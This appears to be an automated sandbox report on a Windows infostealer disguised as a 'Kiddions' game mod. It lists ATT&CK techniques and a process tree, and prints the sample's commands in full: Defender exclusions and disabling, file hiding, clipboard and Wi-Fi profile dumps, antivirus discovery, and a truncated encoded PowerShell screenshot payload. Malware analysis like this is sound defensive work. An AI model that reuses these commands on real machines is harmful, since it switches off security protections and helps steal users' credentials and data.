201ad024aec65bff251565de0d5c366ddf9569b5a78820bd831a3764917b9c59

Analysis

max time kernel
93s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-12-2024 04:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

kiddions/KiddionsV2.exe
Size

8.3MB
MD5

8ff98e2147316eb4fd3cef7eaa9f24b7
SHA1

53baaae552a2b0d71c43623592685e8b7d33f522
SHA256

f0f11202a1ed2c0cfd3f697b8f928d77bd187b2911b186a5a095a9189a07afea
SHA512

de5efe8949507344db174975a40a2d3793108282cebd662f927c11382acb3e37634e2368131206920df4c7a430a408e878d900b12ddee91dbf7bdf6ec555ebe4
SSDEEP

196608:mrP12cEziRLjv+bhqNVoB8Ck5c7GpNlpq41J2Uavbk9qtlDfqWp:W7rL+9qz88Ck+7q3p91JnqfqWp

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2308	powershell.exe
4524	powershell.exe
3996	powershell.exe
432	powershell.exe
5100	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	KiddionsV2.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3944	cmd.exe
692	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2052	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe
5096	KiddionsV2.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
27	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
4472	tasklist.exe
4520	tasklist.exe
2932	tasklist.exe
4260	tasklist.exe
3064	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3100	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0008000000023c23-62.dat	upx
behavioral2/memory/5096-66-0x00007FFC732C0000-0x00007FFC73998000-memory.dmp	upx
behavioral2/files/0x000a000000023b88-68.dat	upx
behavioral2/files/0x000a000000023b89-119.dat	upx
behavioral2/files/0x000a000000023b8e-126.dat	upx
behavioral2/files/0x000a000000023b8d-125.dat	upx
behavioral2/files/0x000a000000023b8c-124.dat	upx
behavioral2/files/0x000a000000023b8b-123.dat	upx
behavioral2/files/0x000a000000023b8a-122.dat	upx
behavioral2/memory/5096-121-0x00007FFC885A0000-0x00007FFC885AF000-memory.dmp	upx
behavioral2/memory/5096-120-0x00007FFC86190000-0x00007FFC861B5000-memory.dmp	upx
behavioral2/files/0x000a000000023b87-118.dat	upx
behavioral2/files/0x0008000000023c45-117.dat	upx
behavioral2/files/0x0016000000023c3b-116.dat	upx
behavioral2/files/0x000b000000023c3a-115.dat	upx
behavioral2/files/0x0008000000023c22-112.dat	upx
behavioral2/files/0x0008000000023c20-111.dat	upx
behavioral2/files/0x0008000000023c21-71.dat	upx
behavioral2/memory/5096-131-0x00007FFC86350000-0x00007FFC8637D000-memory.dmp	upx
behavioral2/memory/5096-132-0x00007FFC86330000-0x00007FFC86349000-memory.dmp	upx
behavioral2/memory/5096-133-0x00007FFC86300000-0x00007FFC86324000-memory.dmp	upx
behavioral2/memory/5096-134-0x00007FFC73140000-0x00007FFC732B6000-memory.dmp	upx
behavioral2/memory/5096-135-0x00007FFC862E0000-0x00007FFC862F9000-memory.dmp	upx
behavioral2/memory/5096-136-0x00007FFC862D0000-0x00007FFC862DD000-memory.dmp	upx
behavioral2/memory/5096-137-0x00007FFC82C10000-0x00007FFC82C43000-memory.dmp	upx
behavioral2/memory/5096-138-0x00007FFC732C0000-0x00007FFC73998000-memory.dmp	upx
behavioral2/memory/5096-139-0x00007FFC72950000-0x00007FFC72A1D000-memory.dmp	upx
behavioral2/memory/5096-140-0x00007FFC86190000-0x00007FFC861B5000-memory.dmp	upx
behavioral2/memory/5096-141-0x00007FFC72420000-0x00007FFC72942000-memory.dmp	upx
behavioral2/memory/5096-144-0x00007FFC83460000-0x00007FFC83474000-memory.dmp	upx
behavioral2/memory/5096-143-0x00007FFC86350000-0x00007FFC8637D000-memory.dmp	upx
behavioral2/memory/5096-146-0x00007FFC862C0000-0x00007FFC862CD000-memory.dmp	upx
behavioral2/memory/5096-145-0x00007FFC86330000-0x00007FFC86349000-memory.dmp	upx
behavioral2/memory/5096-147-0x00007FFC86300000-0x00007FFC86324000-memory.dmp	upx
behavioral2/memory/5096-148-0x00007FFC72300000-0x00007FFC7241B000-memory.dmp	upx
behavioral2/memory/5096-172-0x00007FFC73140000-0x00007FFC732B6000-memory.dmp	upx
behavioral2/memory/5096-173-0x00007FFC862E0000-0x00007FFC862F9000-memory.dmp	upx
behavioral2/memory/5096-269-0x00007FFC82C10000-0x00007FFC82C43000-memory.dmp	upx
behavioral2/memory/5096-325-0x00007FFC72950000-0x00007FFC72A1D000-memory.dmp	upx
behavioral2/memory/5096-328-0x00007FFC72420000-0x00007FFC72942000-memory.dmp	upx
behavioral2/memory/5096-337-0x00007FFC73140000-0x00007FFC732B6000-memory.dmp	upx
behavioral2/memory/5096-345-0x00007FFC72300000-0x00007FFC7241B000-memory.dmp	upx
behavioral2/memory/5096-332-0x00007FFC86190000-0x00007FFC861B5000-memory.dmp	upx
behavioral2/memory/5096-331-0x00007FFC732C0000-0x00007FFC73998000-memory.dmp	upx
behavioral2/memory/5096-373-0x00007FFC73140000-0x00007FFC732B6000-memory.dmp	upx
behavioral2/memory/5096-381-0x00007FFC72300000-0x00007FFC7241B000-memory.dmp	upx
behavioral2/memory/5096-387-0x00007FFC86300000-0x00007FFC86324000-memory.dmp	upx
behavioral2/memory/5096-386-0x00007FFC86330000-0x00007FFC86349000-memory.dmp	upx
behavioral2/memory/5096-385-0x00007FFC86350000-0x00007FFC8637D000-memory.dmp	upx
behavioral2/memory/5096-384-0x00007FFC885A0000-0x00007FFC885AF000-memory.dmp	upx
behavioral2/memory/5096-383-0x00007FFC86190000-0x00007FFC861B5000-memory.dmp	upx
behavioral2/memory/5096-382-0x00007FFC732C0000-0x00007FFC73998000-memory.dmp	upx
behavioral2/memory/5096-380-0x00007FFC862C0000-0x00007FFC862CD000-memory.dmp	upx
behavioral2/memory/5096-379-0x00007FFC83460000-0x00007FFC83474000-memory.dmp	upx
behavioral2/memory/5096-378-0x00007FFC72420000-0x00007FFC72942000-memory.dmp	upx
behavioral2/memory/5096-377-0x00007FFC72950000-0x00007FFC72A1D000-memory.dmp	upx
behavioral2/memory/5096-376-0x00007FFC82C10000-0x00007FFC82C43000-memory.dmp	upx
behavioral2/memory/5096-375-0x00007FFC862D0000-0x00007FFC862DD000-memory.dmp	upx
behavioral2/memory/5096-374-0x00007FFC862E0000-0x00007FFC862F9000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
3680	cmd.exe
1692	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1136	cmd.exe
2936	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1052	WMIC.exe
4312	WMIC.exe
2716	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1512	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1692	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
5100	powershell.exe
2308	powershell.exe
2308	powershell.exe
5100	powershell.exe
5100	powershell.exe
2308	powershell.exe
4524	powershell.exe
4524	powershell.exe
692	powershell.exe
692	powershell.exe
1048	powershell.exe
1048	powershell.exe
692	powershell.exe
1048	powershell.exe
3996	powershell.exe
3996	powershell.exe
2308	powershell.exe
2308	powershell.exe
432	powershell.exe
432	powershell.exe
5008	powershell.exe
5008	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2932	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: 36	1628	WMIC.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeIncreaseQuotaPrivilege	1628	WMIC.exe
Token: SeSecurityPrivilege	1628	WMIC.exe
Token: SeTakeOwnershipPrivilege	1628	WMIC.exe
Token: SeLoadDriverPrivilege	1628	WMIC.exe
Token: SeSystemProfilePrivilege	1628	WMIC.exe
Token: SeSystemtimePrivilege	1628	WMIC.exe
Token: SeProfSingleProcessPrivilege	1628	WMIC.exe
Token: SeIncBasePriorityPrivilege	1628	WMIC.exe
Token: SeCreatePagefilePrivilege	1628	WMIC.exe
Token: SeBackupPrivilege	1628	WMIC.exe
Token: SeRestorePrivilege	1628	WMIC.exe
Token: SeShutdownPrivilege	1628	WMIC.exe
Token: SeDebugPrivilege	1628	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1628	WMIC.exe
Token: SeRemoteShutdownPrivilege	1628	WMIC.exe
Token: SeUndockPrivilege	1628	WMIC.exe
Token: SeManageVolumePrivilege	1628	WMIC.exe
Token: 33	1628	WMIC.exe
Token: 34	1628	WMIC.exe
Token: 35	1628	WMIC.exe
Token: 36	1628	WMIC.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeIncreaseQuotaPrivilege	1052	WMIC.exe
Token: SeSecurityPrivilege	1052	WMIC.exe
Token: SeTakeOwnershipPrivilege	1052	WMIC.exe
Token: SeLoadDriverPrivilege	1052	WMIC.exe
Token: SeSystemProfilePrivilege	1052	WMIC.exe
Token: SeSystemtimePrivilege	1052	WMIC.exe
Token: SeProfSingleProcessPrivilege	1052	WMIC.exe
Token: SeIncBasePriorityPrivilege	1052	WMIC.exe
Token: SeCreatePagefilePrivilege	1052	WMIC.exe
Token: SeBackupPrivilege	1052	WMIC.exe
Token: SeRestorePrivilege	1052	WMIC.exe
Token: SeShutdownPrivilege	1052	WMIC.exe
Token: SeDebugPrivilege	1052	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1052	WMIC.exe
Token: SeRemoteShutdownPrivilege	1052	WMIC.exe
Token: SeUndockPrivilege	1052	WMIC.exe
Token: SeManageVolumePrivilege	1052	WMIC.exe
Token: 33	1052	WMIC.exe
Token: 34	1052	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4232 wrote to memory of 5096	4232	KiddionsV2.exe	83
PID 4232 wrote to memory of 5096	4232	KiddionsV2.exe	83
PID 5096 wrote to memory of 4520	5096	KiddionsV2.exe	84
PID 5096 wrote to memory of 4520	5096	KiddionsV2.exe	84
PID 5096 wrote to memory of 400	5096	KiddionsV2.exe	85
PID 5096 wrote to memory of 400	5096	KiddionsV2.exe	85
PID 5096 wrote to memory of 2400	5096	KiddionsV2.exe	86
PID 5096 wrote to memory of 2400	5096	KiddionsV2.exe	86
PID 5096 wrote to memory of 3368	5096	KiddionsV2.exe	88
PID 5096 wrote to memory of 3368	5096	KiddionsV2.exe	88
PID 5096 wrote to memory of 5012	5096	KiddionsV2.exe	92
PID 5096 wrote to memory of 5012	5096	KiddionsV2.exe	92
PID 3368 wrote to memory of 2932	3368	cmd.exe	94
PID 3368 wrote to memory of 2932	3368	cmd.exe	94
PID 5012 wrote to memory of 1628	5012	cmd.exe	95
PID 5012 wrote to memory of 1628	5012	cmd.exe	95
PID 2400 wrote to memory of 4992	2400	cmd.exe	96
PID 2400 wrote to memory of 4992	2400	cmd.exe	96
PID 4520 wrote to memory of 2308	4520	cmd.exe	97
PID 4520 wrote to memory of 2308	4520	cmd.exe	97
PID 400 wrote to memory of 5100	400	cmd.exe	98
PID 400 wrote to memory of 5100	400	cmd.exe	98
PID 5096 wrote to memory of 1048	5096	KiddionsV2.exe	100
PID 5096 wrote to memory of 1048	5096	KiddionsV2.exe	100
PID 1048 wrote to memory of 116	1048	cmd.exe	102
PID 1048 wrote to memory of 116	1048	cmd.exe	102
PID 5096 wrote to memory of 5016	5096	KiddionsV2.exe	103
PID 5096 wrote to memory of 5016	5096	KiddionsV2.exe	103
PID 5016 wrote to memory of 1788	5016	cmd.exe	105
PID 5016 wrote to memory of 1788	5016	cmd.exe	105
PID 5096 wrote to memory of 2172	5096	KiddionsV2.exe	106
PID 5096 wrote to memory of 2172	5096	KiddionsV2.exe	106
PID 2172 wrote to memory of 1052	2172	cmd.exe	108
PID 2172 wrote to memory of 1052	2172	cmd.exe	108
PID 5096 wrote to memory of 436	5096	KiddionsV2.exe	109
PID 5096 wrote to memory of 436	5096	KiddionsV2.exe	109
PID 436 wrote to memory of 4312	436	cmd.exe	111
PID 436 wrote to memory of 4312	436	cmd.exe	111
PID 5096 wrote to memory of 3100	5096	KiddionsV2.exe	112
PID 5096 wrote to memory of 3100	5096	KiddionsV2.exe	112
PID 5096 wrote to memory of 4340	5096	KiddionsV2.exe	114
PID 5096 wrote to memory of 4340	5096	KiddionsV2.exe	114
PID 3100 wrote to memory of 1804	3100	cmd.exe	155
PID 3100 wrote to memory of 1804	3100	cmd.exe	155
PID 4340 wrote to memory of 4524	4340	cmd.exe	117
PID 4340 wrote to memory of 4524	4340	cmd.exe	117
PID 5096 wrote to memory of 1284	5096	KiddionsV2.exe	118
PID 5096 wrote to memory of 1284	5096	KiddionsV2.exe	118
PID 5096 wrote to memory of 2908	5096	KiddionsV2.exe	120
PID 5096 wrote to memory of 2908	5096	KiddionsV2.exe	120
PID 1284 wrote to memory of 4260	1284	cmd.exe	122
PID 1284 wrote to memory of 4260	1284	cmd.exe	122
PID 2908 wrote to memory of 3064	2908	cmd.exe	123
PID 2908 wrote to memory of 3064	2908	cmd.exe	123
PID 5096 wrote to memory of 4932	5096	KiddionsV2.exe	124
PID 5096 wrote to memory of 4932	5096	KiddionsV2.exe	124
PID 5096 wrote to memory of 3944	5096	KiddionsV2.exe	126
PID 5096 wrote to memory of 3944	5096	KiddionsV2.exe	126
PID 5096 wrote to memory of 4760	5096	KiddionsV2.exe	128
PID 5096 wrote to memory of 4760	5096	KiddionsV2.exe	128
PID 5096 wrote to memory of 3660	5096	KiddionsV2.exe	130
PID 5096 wrote to memory of 3660	5096	KiddionsV2.exe	130
PID 5096 wrote to memory of 1404	5096	KiddionsV2.exe	132
PID 5096 wrote to memory of 1404	5096	KiddionsV2.exe	132

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1804	attrib.exe
3984	attrib.exe
1088	attrib.exe

C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe
"C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4232
- C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe
  "C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:5096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4520
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:400
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('womp womp - on doxbin soon', 0, 'FUCKED BY CARTER / 9_7s on discord monkey', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('womp womp - on doxbin soon', 0, 'FUCKED BY CARTER / 9_7s on discord monkey', 0+16);close()"
      4⤵
      PID:4992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1048
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5016
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2172
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:1052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:436
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:3100
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\kiddions\KiddionsV2.exe"
      4⤵
      Views/modifies file attributes
      PID:1804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1284
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2908
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:4932
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:3944
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:692
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4760
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3660
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1136
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1404
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1488
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:2140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIA